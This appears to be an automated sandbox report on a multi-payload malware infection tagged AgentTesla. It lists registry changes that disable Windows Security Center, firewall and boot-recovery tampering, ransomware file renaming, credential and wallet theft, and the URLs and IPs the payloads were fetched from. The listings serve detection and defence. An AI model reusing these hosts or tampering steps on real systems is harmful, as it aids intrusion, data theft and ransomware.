agenttesla | 2e51701c2ae78af7f1ff4d2aed64148e19d138c36c4096cae67c638e642e054e

Processes:

syslmgrsvc.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	syslmgrsvc.exe

Contacts a large (4102) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

6032 bcdedit.exe
1548 bcdedit.exe
Renames multiple (7026) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

pid	process
6032	bcdedit.exe
1548	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
11784	powershell.EXE
13988	powershell.exe
15336	powershell.exe
1208	powershell.exe
7328	powershell.exe
8592	powershell.exe
4764	powershell.exe
1208	powershell.exe
3556	powershell.exe
4032	powershell.exe
5932	powershell.exe
1208	powershell.exe
3876	powershell.exe
3744	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

http77.91.77.81lendservices64.exe.exeWindowsAutHost

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	http77.91.77.81lendservices64.exe.exe
File created	C:\Windows\system32\drivers\etc\hosts	WindowsAutHost

Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

4612 netsh.exe
25428 netsh.exe
5284 netsh.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

21048 takeown.exe
21164 icacls.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
4612	netsh.exe
25428	netsh.exe
5284	netsh.exe

pid	process
21048	takeown.exe
21164	icacls.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/memory/3600-5883-0x0000000002920000-0x0000000002990000-memory.dmp	net_reactor
behavioral2/memory/3600-5894-0x0000000004F40000-0x0000000004FAE000-memory.dmp	net_reactor

Drops startup file 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe	svchost.exe

Executes dropped EXE 64 IoCs

Processes:

http185.215.113.66pei.exe.exehttptwizt.netnewtpp.exe.exesyslmgrsvc.exe1621415420.exehttp77.91.77.81lendservices64.exe.exehttp77.91.77.81lendredline123123.exe.exehttp77.91.77.81lendlumma1234.exe.exe1787010459.exehttp77.91.77.81lendlumma123.exe.exehttp77.91.77.81lendjudit.exe.exestub.exehttp77.91.77.81lendupd.exe.exehttp77.91.77.81lendgold.exe.exesvhoost.exehttp77.91.77.81lendlrthijawd.exe.exeOne.exehttp77.91.77.81lend33333.exe.exehttp77.91.77.81lendnewbild.exe.exehttp77.91.77.81lendswizzzz.exe.exework.exe84855294.exehttp107.173.143.2820056igcc.exe.exesvhoost.exejergs.exeOne.exehttp198.23.201.89warmquote.exe.exehttp77.91.77.81lendbuildjudit.exe.exestub.exehttpstestdomain123123.shopFrameworkSurvivor.exe.exehttp198.23.227.21320040igcc.exe.exehttpscecil.com.egtemplegendainstalls.exe.exehttp107.173.143.2820055igcc.exe.exehttp5.42.65.116lumma2705.exe.exevklwj.exehttp204.137.14.1350603.exe.exehttp107.173.143.2820056igcc.exe.exehttpswondershare-filmora.topfwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31443wefefwwfer3232fewwefwefwefqgrqwtherergqefwefqweqfwqf32fefwsdauploadsamm.exe.exehttp198.23.227.21320040igcc.exe.exehttp107.173.143.2820055igcc.exe.exehttp107.173.143.2820055igcc.exe.exehttp147.45.47.14954674radekano.exe.exeWindowsAutHostChild.pifhttp147.45.47.121Chrome.exe.exe380533075.exe3194226347.exewupgrdsv.exevklwj.exehttp192.3.83.115AAQ.exe.exehttp49.13.194.118ADServices.exe.exehttpsraw.githubusercontent.comJonasBWFreakyJolly.commasterDemoZinker.exe.exehttpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exesvchost.exehttpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.exehttp185.73.125.6applicationld.exe.exehttpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp7z.exehttp185.73.125.6MSiedge.exe.exehttpsraw.githubusercontent.comsheksweetsheksweet1mainRambledMime.exe.exe7z.exehttp77.91.77.33current.exe.exehttpdoggie-services.comooriggmixinte.exe.exehttpjobs-servers.comooriggmixinte.exe.exehttpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe

pid	process
4756	http185.215.113.66pei.exe.exe
3016	httptwizt.netnewtpp.exe.exe
976	syslmgrsvc.exe
2696	1621415420.exe
1400	http77.91.77.81lendservices64.exe.exe
3288	http77.91.77.81lendredline123123.exe.exe
2252	http77.91.77.81lendlumma1234.exe.exe
1832	1787010459.exe
3436	http77.91.77.81lendlumma123.exe.exe
3156	http77.91.77.81lendjudit.exe.exe
1412	stub.exe
2888	http77.91.77.81lendupd.exe.exe
2700	http77.91.77.81lendgold.exe.exe
4212	svhoost.exe
2340	http77.91.77.81lendlrthijawd.exe.exe
3512	One.exe
1616	http77.91.77.81lend33333.exe.exe
4764	http77.91.77.81lendnewbild.exe.exe
1156	http77.91.77.81lendswizzzz.exe.exe
1576	work.exe
4712	84855294.exe
2696	http107.173.143.2820056igcc.exe.exe
1472	svhoost.exe
3872	jergs.exe
3284	One.exe
3004	http198.23.201.89warmquote.exe.exe
5220	http77.91.77.81lendbuildjudit.exe.exe
5620	stub.exe
5868	httpstestdomain123123.shopFrameworkSurvivor.exe.exe
5276	http198.23.227.21320040igcc.exe.exe
5296	httpscecil.com.egtemplegendainstalls.exe.exe
5568	http107.173.143.2820055igcc.exe.exe
5636	http5.42.65.116lumma2705.exe.exe
6100	vklwj.exe
5240	http204.137.14.1350603.exe.exe
4388	http107.173.143.2820056igcc.exe.exe
2696	httpswondershare-filmora.topfwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31443wefefwwfer3232fewwefwefwefqgrqwtherergqefwefqweqfwqf32fefwsdauploadsamm.exe.exe
5660	http198.23.227.21320040igcc.exe.exe
5040	http107.173.143.2820055igcc.exe.exe
5536	http107.173.143.2820055igcc.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
5316	WindowsAutHost
5876	Child.pif
2992	http147.45.47.121Chrome.exe.exe
1660	380533075.exe
5640	3194226347.exe
5940	wupgrdsv.exe
5796	vklwj.exe
4760	http192.3.83.115AAQ.exe.exe
3972	http49.13.194.118ADServices.exe.exe
2820	httpsraw.githubusercontent.comJonasBWFreakyJolly.commasterDemoZinker.exe.exe
2376	httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
2172	svchost.exe
4016	httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.exe
4884	http185.73.125.6applicationld.exe.exe
1916	httpssoftcatalog.rudownload404a6ca328-7888-3279-b672-d1d9d0a46ee2GTA_V.exe.tmp
5024	7z.exe
4484	http185.73.125.6MSiedge.exe.exe
4856	httpsraw.githubusercontent.comsheksweetsheksweet1mainRambledMime.exe.exe
6540	7z.exe
6104	http77.91.77.33current.exe.exe
7688	httpdoggie-services.comooriggmixinte.exe.exe
2296	httpjobs-servers.comooriggmixinte.exe.exe
7780	httpmiles-and-more-kreditkartes.comooriggmixinte.exe.exe

Loads dropped DLL 64 IoCs

Processes:

stub.exestub.exe

pid	process
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
1412	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe
5620	stub.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

21048 takeown.exe
21164 icacls.exe
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
21048	takeown.exe
21164	icacls.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\http194.59.31.109POz.png.exe	upx
C:\Users\Admin\AppData\Local\Temp\http194.59.31.109bJL.png.exe	upx
C:\Users\Admin\AppData\Local\Temp\http192.3.83.115AAQ.exe.exe	upx
behavioral2/memory/4760-1722-0x0000000000FB0000-0x0000000001170000-memory.dmp	upx
behavioral2/memory/4760-28435-0x0000000000FB0000-0x0000000001170000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX1\A.I.exe	upx

Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 208.67.222.222
Destination IP 208.67.222.222
Destination IP 208.67.222.222

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comSnusikOdlootarawmainlordga.exe.exe	vmprotect

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

syslmgrsvc.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	syslmgrsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	syslmgrsvc.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

httptwizt.netnewtpp.exe.exehttp107.173.143.2820056igcc.exe.exehttp107.173.143.2820055igcc.exe.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslmgrsvc.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe"	http107.173.143.2820056igcc.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe"	http107.173.143.2820055igcc.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..."	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates connected drives 3 TTPs 50 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

svchost.exesvchost.exehttp185.73.125.6applicationld.exe.exeExplorer.EXE

description	ioc	process
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\D:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\V:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\X:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\E:	Explorer.EXE
File opened (read-only)	\??\A:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\I:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\U:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\P:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\S:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\K:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\O:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\Z:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\D:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\N:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\L:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\T:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\W:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\Y:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\E:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\H:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\G:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\B:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\M:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\J:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Q:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\R:	http185.73.125.6applicationld.exe.exe
File opened (read-only)	\??\R:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
6044	raw.githubusercontent.com
5	raw.githubusercontent.com
20	raw.githubusercontent.com
95	raw.githubusercontent.com
147	raw.githubusercontent.com
253	bitbucket.org
254	bitbucket.org
6008	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 ip-api.com
62 api.ipify.org
63 api.ipify.org
179 api.ipify.org

flow	ioc
12	ip-api.com
62	api.ipify.org
63	api.ipify.org
179	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

Processes:

httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exesvchost.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	httpsfree.360totalsecurity.comtotalsecurity360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe.exe
File opened for modification	\??\PhysicalDrive0	svchost.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/4760-28435-0x0000000000FB0000-0x0000000001170000-memory.dmp	autoit_exe

Drops file in System32 directory 19 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWindowsAutHostOfficeClickToRun.exesvchost.exeDllHost.exesvchost.exeWindowsAutHostpowershell.exehttp77.91.77.81lendservices64.exe.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	WindowsAutHost
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Windows Upgrade Manager	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	WindowsAutHost
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	http77.91.77.81lendservices64.exe.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

Processes:

http77.91.77.81lendservices64.exe.exeWindowsAutHosthttp147.45.47.14954674radekano.exe.exeWindowsAutHost

pid	process
1400	http77.91.77.81lendservices64.exe.exe
1400	http77.91.77.81lendservices64.exe.exe
5316	WindowsAutHost
5316	WindowsAutHost
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe
7896	WindowsAutHost
7896	WindowsAutHost
6092	http147.45.47.14954674radekano.exe.exe
6092	http147.45.47.14954674radekano.exe.exe

Suspicious use of SetThreadContext 19 IoCs

Processes:

http77.91.77.81lendlumma1234.exe.exehttp77.91.77.81lendlumma123.exe.exehttp77.91.77.81lendupd.exe.exehttp77.91.77.81lendgold.exe.exehttp77.91.77.81lend33333.exe.exehttp77.91.77.81lendswizzzz.exe.exehttp5.42.65.116lumma2705.exe.exehttp107.173.143.2820056igcc.exe.exehttpscecil.com.egtemplegendainstalls.exe.exehttpswondershare-filmora.topfwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31443wefefwwfer3232fewwefwefwefqgrqwtherergqefwefqweqfwqf32fefwsdauploadsamm.exe.exehttp198.23.227.21320040igcc.exe.exehttp107.173.143.2820055igcc.exe.exehttp77.91.77.81lendservices64.exe.exeWindowsAutHosthttpsraw.githubusercontent.comJonasBWFreakyJolly.commasterDemoZinker.exe.exehttpsraw.githubusercontent.comsheksweetsheksweet1mainRambledMime.exe.exeRegAsm.exe

description	pid	process	target process
PID 2252 set thread context of 3584	2252	http77.91.77.81lendlumma1234.exe.exe	RegAsm.exe
PID 3436 set thread context of 3460	3436	http77.91.77.81lendlumma123.exe.exe	RegAsm.exe
PID 2888 set thread context of 680	2888	http77.91.77.81lendupd.exe.exe	RegAsm.exe
PID 2700 set thread context of 3476	2700	http77.91.77.81lendgold.exe.exe	cmd.exe
PID 1616 set thread context of 484	1616	http77.91.77.81lend33333.exe.exe	RegAsm.exe
PID 1156 set thread context of 424	1156	http77.91.77.81lendswizzzz.exe.exe	RegAsm.exe
PID 5636 set thread context of 4172	5636	http5.42.65.116lumma2705.exe.exe	RegAsm.exe
PID 2696 set thread context of 4388	2696	http107.173.143.2820056igcc.exe.exe	http107.173.143.2820056igcc.exe.exe
PID 5296 set thread context of 5588	5296	httpscecil.com.egtemplegendainstalls.exe.exe	aspnet_regiis.exe
PID 2696 set thread context of 684	2696	httpswondershare-filmora.topfwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31443wefefwwfer3232fewwefwefwefqgrqwtherergqefwefqweqfwqf32fefwsdauploadsamm.exe.exe	RegAsm.exe
PID 5276 set thread context of 5660	5276	http198.23.227.21320040igcc.exe.exe	http198.23.227.21320040igcc.exe.exe
PID 5568 set thread context of 5536	5568	http107.173.143.2820055igcc.exe.exe	http107.173.143.2820055igcc.exe.exe
PID 1400 set thread context of 1048	1400	http77.91.77.81lendservices64.exe.exe	dialer.exe
PID 5316 set thread context of 6044	5316	WindowsAutHost	dialer.exe
PID 5316 set thread context of 1980	5316	WindowsAutHost	dialer.exe
PID 5316 set thread context of 3096	5316	WindowsAutHost	dialer.exe
PID 2820 set thread context of 1088	2820	httpsraw.githubusercontent.comJonasBWFreakyJolly.commasterDemoZinker.exe.exe	RegAsm.exe
PID 4856 set thread context of 1004	4856	httpsraw.githubusercontent.comsheksweetsheksweet1mainRambledMime.exe.exe	RegAsm.exe
PID 1004 set thread context of 3600	1004	RegAsm.exe	RegAsm.exe

Drops file in Program Files directory 64 IoCs

Processes:

http185.73.125.6applicationld.exe.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\altDekstopCopyPasteHelper.js	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\plugins.dat	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-96_altform-unplated.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_x64__8wekyb3d8bbwe\Assets\contrast-black\NotepadAppList.targetsize-64.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TipsBadgeLogo.scale-125.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorSplashScreen.scale-200_altform-colorful.png	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\office.odf	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\HOW TO BACK FILES.txt	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\resources.jar	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ppd.xrm-ms	http185.73.125.6applicationld.exe.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\Styling.js	http185.73.125.6applicationld.exe.exe
